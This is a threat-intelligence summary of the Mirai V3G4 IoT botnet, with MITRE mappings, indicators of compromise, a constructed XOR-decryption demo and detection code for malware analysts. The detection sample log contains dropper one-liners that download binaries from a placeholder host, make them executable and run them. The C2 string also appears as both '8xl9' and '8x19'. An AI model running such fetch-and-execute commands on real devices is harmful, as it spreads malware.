Mirai Variant V3G4 Targets IoT Devices

Mirai variant V3G4 was observed between July and December 2022 exploiting 13 vulnerabilities to propagate across exposed Linux-based IoT devices and enlist them in a botnet capable of DDoS and other attacks. It contacts a hardcoded C2 domain, decrypts its strings with multiple rounds of XOR, keeps its embedded credentials XOR-encrypted, allows only one instance per host and kills competing processes from a stop list; it downloads its bot clients with wget/curl and spreads further by brute-forcing weak credentials. #Mirai #V3G4 #IoTDevices

Keypoints

  • Mirai variant V3G4 was observed during July–December 2022 targeting exposed Linux-based IoT devices.
  • The campaigns exploited 13 vulnerabilities to achieve remote code execution, then used wget and curl to download and run the bot clients.
  • The malware connects to a hardcoded C2 domain; the string 8xl9 recurs in the C2 domains across the campaigns.
  • V3G4 decrypts its botnet-execution strings with four rounds of XOR and XOR-encrypts its embedded credentials, using different keys for different scenarios.
  • A single-instance check keeps only one bot process on the host, and a stop list names competing processes that the client searches for and terminates.
  • Brute-forcing weak telnet/SSH credentials drives propagation to other devices, with the embedded credential list used for scanning.
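
The multi-round XOR string decryption described above, as an added example that is not Unit 42's code or the V3G4 sample: it shows how a string table protected by several rounds of single-byte XOR is decrypted, why those rounds collapse into one effective key, and how an analyst recovers that key from a known plaintext (crib) and dumps the decrypted strings. ROUND_KEYS, the string table and the crib are constructed for the demo; the page does not publish the sample's keys.

```python
"""Added example (not Unit 42's code or the V3G4 sample): decrypting a
string table obfuscated with several rounds of single-byte XOR, and
recovering the key with a known plaintext. Keys and strings are
constructed; the real sample's keys are not on the page."""

from functools import reduce
from typing import List

# Constructed per-round keys (assumption: one single-byte key per round).
ROUND_KEYS = [0x37, 0x5A, 0xC9, 0x0E]


def xor_round(data: bytes, key: int) -> bytes:
    """XOR every byte with one single-byte key."""
    return bytes(b ^ key for b in data)


def decrypt_multiround(data: bytes, keys: List[int] = ROUND_KEYS) -> bytes:
    """Apply the rounds in order, as the bot would before using a string
    (a C2 host, a command line, a credential)."""
    for k in keys:
        data = xor_round(data, k)
    return data


def encrypt_multiround(plain: bytes, keys: List[int] = ROUND_KEYS) -> bytes:
    """XOR is its own inverse, so encryption is the same rounds in reverse
    order (for single-byte keys the order does not even matter)."""
    for k in reversed(keys):
        plain = xor_round(plain, k)
    return plain


def effective_key(keys: List[int] = ROUND_KEYS) -> int:
    """Stacked single-byte XOR rounds equal one XOR with the XOR of all
    keys, so 'four rounds' add no strength beyond a single byte."""
    return reduce(lambda a, b: a ^ b, keys, 0)


def candidate_keys(cipher: bytes, crib: bytes) -> List[int]:
    """Known-plaintext attack: every single-byte key under which the
    decrypted data contains the crib (e.g. b'wget', b'/bin/busybox')."""
    return [k for k in range(256) if crib in xor_round(cipher, k)]


def printable_strings(blob: bytes, key: int, min_len: int = 4) -> List[str]:
    """Decrypt a blob with one key and return its printable runs, the
    'decrypted strings' pass an analyst runs over an unpacked sample."""
    out, cur = [], bytearray()
    for b in xor_round(blob, key):
        if 0x20 <= b < 0x7F:
            cur.append(b)
            continue
        if len(cur) >= min_len:
            out.append(cur.decode("ascii"))
        cur = bytearray()
    if len(cur) >= min_len:
        out.append(cur.decode("ascii"))
    return out


# Constructed string table, NUL-separated as a C binary would store it.
DEMO_TABLE = b"\x00".join([b"c2.example.invalid", b"wget", b"/bin/busybox"])
DEMO_BLOB = encrypt_multiround(DEMO_TABLE)

if __name__ == "__main__":
    k = effective_key()
    print(f"effective single-byte key: {k:#04x}")
    print("candidate keys for crib b'wget':", candidate_keys(DEMO_BLOB, b"wget"))
    print("decrypted strings:", printable_strings(DEMO_BLOB, k))
```

The practical point for analysis is effective_key: with fixed single-byte keys the round count is cosmetic, so one crib such as a known command or path is enough to decrypt every string in the table. If the sample instead uses a different key per scenario, as the report says it does for credentials, run candidate_keys separately against each table.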

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Thirteen vulnerabilities leading to remote code execution were exploited to gain a foothold on exposed devices. Quote: “The threat actor exploited 13 vulnerabilities that could lead to remote code execution.”
  • [T1105] Ingress Tool Transfer – After exploitation, wget and curl fetch the Mirai bot clients from the malware infrastructure and the downloaded binaries are executed. Quote: “wget and curl utilities are automatically executed to download Mirai client samples from malware infrastructure and then execute the downloaded bot clients.”
  • [T1110] Brute Force – The V3G4 variant spreads by brute-forcing weak username/password combinations on network devices. Quote: “spreads itself through brute forcing network devices’ weak username/password combinations.”
  • [T1027] Obfuscated Files or Information – Strings used for botnet execution are decrypted with four rounds of XOR, and the embedded credentials are XOR-encrypted with a separate key. Quote: “All the botnet client execution-related strings are decrypted with four rounds of XOR decryption (shown in Figure 7).”
  • [T1562.001] Impair Defenses: Disable or Modify Tools – The bot carries a stop list of process names that it searches for and terminates, removing competing malware and tools from the host. Quote: “The botnet client searches for and terminates” the processes on its stop list.
  • [T1071.001] Application Layer Protocol: Web Protocols – The V3G4 variant connects to a hardcoded C2 domain to receive commands; the quoted text establishes the hardcoded C2, not the transport protocol, so confirm the protocol in the sample before relying on HTTP-based detections. Quote: “The V3G4 variant tries to connect to its hardcoded C2.”
  • [T1497.001] Virtualization/Sandbox Evasion: System Checks – A single-instance check ensures only one bot process runs; it is primarily an anti-duplication measure but also makes the bot exit quietly when re-run in an analysis environment. Quote: “only one instance of this malware is executing on the infected device. If a botnet process already exists, the botnet client will simply print a string from the console and exit.”
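
Detection logic for the two network-visible behaviours in this list, T1105 (a wget/curl download that is immediately made executable and run, the dropper pattern the quote describes) and T1110 (bursts of failed telnet/SSH logins from one source), as an added example that is not Unit 42's code. The log format, hostnames, URLs and IP addresses are constructed for the demo; adapt the two regular expressions to the EXECVE and authentication records your own collector emits.

```python
"""Added example (not Unit 42's code): detection logic for two behaviours
the report attributes to V3G4, run over constructed log lines.
  T1105: a shell command line that fetches a file with wget/curl, marks
         it executable and runs it (the bot's dropper pattern).
  T1110: many failed telnet/SSH logins from one source in a short window.
Log format, hostnames, URLs and IP addresses are all constructed."""

import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Iterator, List, Tuple

# Constructed records: "<ISO time> <host> EXEC <command line>"
#                  or: "<ISO time> <host> AUTHFAIL <service> user=<u> src=<ip>"
SAMPLE_LOG = """\
2022-09-01T10:00:01 cam-01 EXEC cd /tmp; wget http://dl.example.invalid/bins/x86; chmod +x x86; ./x86; rm -rf x86
2022-09-01T10:00:02 cam-01 EXEC ls -la /tmp
2022-09-01T10:00:05 dvr-02 EXEC curl -s http://dl.example.invalid/bins/arm7 -o /tmp/arm7 && chmod 777 /tmp/arm7 && /tmp/arm7
2022-09-01T10:00:09 nas-03 EXEC curl -s https://pkg.example.invalid/list.json -o /tmp/list.json
2022-09-01T10:01:00 gw-04 AUTHFAIL telnet user=root src=203.0.113.7
2022-09-01T10:01:01 gw-04 AUTHFAIL telnet user=admin src=203.0.113.7
2022-09-01T10:01:02 gw-04 AUTHFAIL telnet user=root src=203.0.113.7
2022-09-01T10:01:03 gw-04 AUTHFAIL telnet user=support src=203.0.113.7
2022-09-01T10:01:04 gw-04 AUTHFAIL telnet user=admin src=203.0.113.7
2022-09-01T10:01:05 gw-04 AUTHFAIL telnet user=user src=203.0.113.7
2022-09-01T10:05:00 gw-04 AUTHFAIL ssh user=alice src=198.51.100.9
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<kind>EXEC|AUTHFAIL) (?P<rest>.*)$")
# A wget/curl invocation carrying a URL, confined to one shell stage.
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl)\b[^;&|]*?(https?://\S+)")
# Shell command separators: ; && || |
STAGE_SEP = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")


def parse(log: str) -> Iterator[Tuple[datetime, str, str, str]]:
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["host"], m["kind"], m["rest"]


def fetched_basename(stage: str) -> str:
    """Name the download lands under: the -o/-O target if given, else the
    last path element of the URL."""
    m = re.search(r"\s-[oO]\s+(\S+)", stage)
    url = DOWNLOAD_RE.search(stage)
    target = m.group(1) if m else (url.group(1) if url else "")
    return target.rstrip("/").rsplit("/", 1)[-1]


def is_download_and_execute(cmd: str) -> bool:
    """True when a later stage of the same command line chmods and then
    executes the file that a wget/curl stage fetched."""
    stages = STAGE_SEP.split(cmd)
    for i, stage in enumerate(stages):
        if not DOWNLOAD_RE.search(stage):
            continue
        name = fetched_basename(stage)
        later = [s.split() for s in stages[i + 1:] if s.split()]
        chmod = any(t[0] == "chmod" and any(a.rsplit("/", 1)[-1] == name for a in t[1:])
                    for t in later)
        execd = any(t[0].rsplit("/", 1)[-1] == name for t in later)
        if name and chmod and execd:
            return True
    return False


def download_and_execute_events(log: str) -> List[Tuple[str, str]]:
    """(host, command line) for every EXEC record matching the dropper pattern."""
    return [(host, rest) for _, host, kind, rest in parse(log)
            if kind == "EXEC" and is_download_and_execute(rest)]


def brute_force_sources(log: str, threshold: int = 5,
                        window: timedelta = timedelta(seconds=60)) -> List[Tuple[str, str, int]]:
    """(host, source IP, peak failures inside any `window`) for sources that
    reach `threshold`; a sliding window, so a slow spray below the rate is
    deliberately not flagged."""
    failures = defaultdict(list)
    for ts, host, kind, rest in parse(log):
        if kind == "AUTHFAIL":
            src = re.search(r"\bsrc=(\S+)", rest).group(1)
            failures[(host, src)].append(ts)
    hits = []
    for (host, src), times in failures.items():
        times.sort()
        peak, start = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            hits.append((host, src, peak))
    return hits


if __name__ == "__main__":
    for host, cmd in download_and_execute_events(SAMPLE_LOG):
        print(f"[T1105] {host}: {cmd}")
    for host, src, n in brute_force_sources(SAMPLE_LOG):
        print(f"[T1110] {host}: {n} failed logins from {src}")
```

The nas-03 line is included on purpose: a curl that only writes a JSON file is not flagged, because the rule requires the chmod and the execution of the same basename in the same command line, which is what separates the dropper one-liner from routine downloads. The brute-force rule keys on (host, source) so a single scanner trying the embedded credential list against one device stands out even when each username appears only once or twice.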

Indicators of Compromise

  • [Infrastructure] Malware C2 – comeanalyze.8x19[.]com
  • [Infrastructure] Malware Host – 176.123.9[.]238, 198.98.49[.]79, and 104.244.72[.]64
  • [Artifacts] Shell Script Downloader – 0837de91aa6bd52ef79d744daba4238a5a48a79eb91cb1a727da3e97d5b36329, c32f8df3cb019e83e0ac49ab0462c59ec70733c3d516ade011727408751c9d42, and 1 more hash
  • [Artifacts] V3G4 Sample – July Campaign – 7bc99c87a1e0582b5f15f40141226862fbe726b496e1e77c7f95993e8e945733, 88f7b9a8c4f9bb28582c485549b328d6123e8aea33009ce7657f7fc0ef829e03, and 1 more hash
  • [Artifacts] V3G4 Sample – September Campaign – 31926da5ca004a11c1f46947edb220afe3a53f81cf245b3afae7ea1abaec7c38, eed4690f6e4d92b511fcde9a712b1a8405c5333e0ad78a4c676a64b22412e149, and 2 more hashes
  • [Artifacts] V3G4 Sample – December Campaign – 63acd589a53bdec49c624f3cb2fc8319218df721f486e2f15f3c07abed97aae6, 1cf3879d9e93d1ff30ce5ec0f64ff15b1db7d8237160c83efed688d800e5ef12, and 2 more hashes

Read more: https://unit42.paloaltonetworks.com/mirai-variant-v3g4/